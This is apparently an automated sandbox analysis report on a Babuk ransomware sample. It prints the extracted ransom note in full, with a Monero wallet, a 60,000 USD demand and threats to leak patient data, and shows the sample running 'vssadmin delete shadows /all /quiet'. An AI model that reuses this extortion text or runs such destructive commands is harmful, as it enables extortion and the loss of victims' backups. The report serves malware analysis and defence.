Overview

overview

10

Static

static

URLScan

urlscan

1

https://transfer.sh/...

windows7_x64

10

https://transfer.sh/...

windows10_x64

10

Analysis

  • max time kernel
    229s
  • max time network
    192s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    23-01-2022 12:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://transfer.sh/45dIVs/worstgeneration.exe

Score
10/10
babukransomware

Malware Config

Extracted

Path

C:\How To Restore Your Files.txt

Ransom Note
You are probably wondering why you are receiving a message from me. Yesterday, duncanregional.com got breached. You are probably not aware, but over the past few days we have been exfiltrating all of your data that we could get our hands on. We took over 150GB data + patient userdata from dba servers. What happened to your files? Your network was been penetrated. All of your files were encrypted using AES-256-CTR with ChaCha8 Cipher. WARNING: Don't try to decrypt your files, shadow copies were removed, recovery methods can lead to the impossibility of recovery of the certain files. We exclusively have decryption software for your situation, no decryption software is available in the public. Pay 60,000 (USD) in XMR (Monero) to this address: 4BExj4Z7n73316oWSd6k3Wj7A12PFVUSeHoobSPpaCJVdH6Z1oRBBssemrpwW5GyRt7xi3SQCeJzUa1uFoWWNySYCxoHv13 How do you buy XMR? https://bisq.network/ to buy XMR using fiat. Alternatively use a Cryptocurrency exchange to buy XMR: https://www.kraken.com/ Use this guide: https://www.getmonero.org/ After sending the specified amount to our wallet we will provide you with the decryption keys to unlock your files. If you do not respond (24 hour deadline, starting now), or we do not receive a response from you we will start the data to our potential buyers, and leak a partial, All of your clients (patients / employers) will be informed and given proof that their data has been compromised and publish everything in a public way in multiple places and outlets to get more customers interested in buying the data and also reporting the availability of this data to the appropriate news platforms. Contact: telegram: @redeyeg0d email: [email protected]
URLs

https://bisq.network/

https://www.getmonero.org/

Signatures

  • Babuk Locker

    RaaS first seen in 2021 initially called Vasa Locker.

    ransomwarebabuk
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 48 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://transfer.sh/45dIVs/worstgeneration.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2680 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:3700
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
        "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
        3⤵
        • Executes dropped EXE
        • Modifies extensions of user files
        • Enumerates connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1312
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1468
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:1736
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3716
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2540
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2948

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1156-127-0x0000000004AF0000-0x0000000004B60000-memory.dmp

    Filesize

    448KB

    Download

  • memory/1156-131-0x0000000004AF0000-0x0000000004B60000-memory.dmp

    Filesize

    448KB

    Download

  • memory/1156-126-0x0000000004BB0000-0x0000000004BC6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/1156-124-0x0000000004CC0000-0x0000000004D5C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/1156-128-0x0000000005590000-0x000000000559A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1156-123-0x0000000004C20000-0x0000000004CB2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/1156-122-0x0000000005080000-0x000000000557E000-memory.dmp

    Filesize

    5.0MB

    Download

  • memory/1156-125-0x0000000004B80000-0x0000000004BB2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/1156-132-0x0000000008E10000-0x0000000008E2A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1156-133-0x0000000004E60000-0x0000000004E66000-memory.dmp

    Filesize

    24KB

    Download

  • memory/1156-134-0x0000000009410000-0x0000000009760000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1156-135-0x0000000004F50000-0x0000000004F72000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1156-121-0x00000000001F0000-0x000000000025C000-memory.dmp

    Filesize

    432KB

    Download

  • memory/1312-136-0x0000000000400000-0x0000000000418000-memory.dmp

    Filesize

    96KB

    Download

  • memory/1312-138-0x0000000000400000-0x0000000000418000-memory.dmp

    Filesize

    96KB

    Download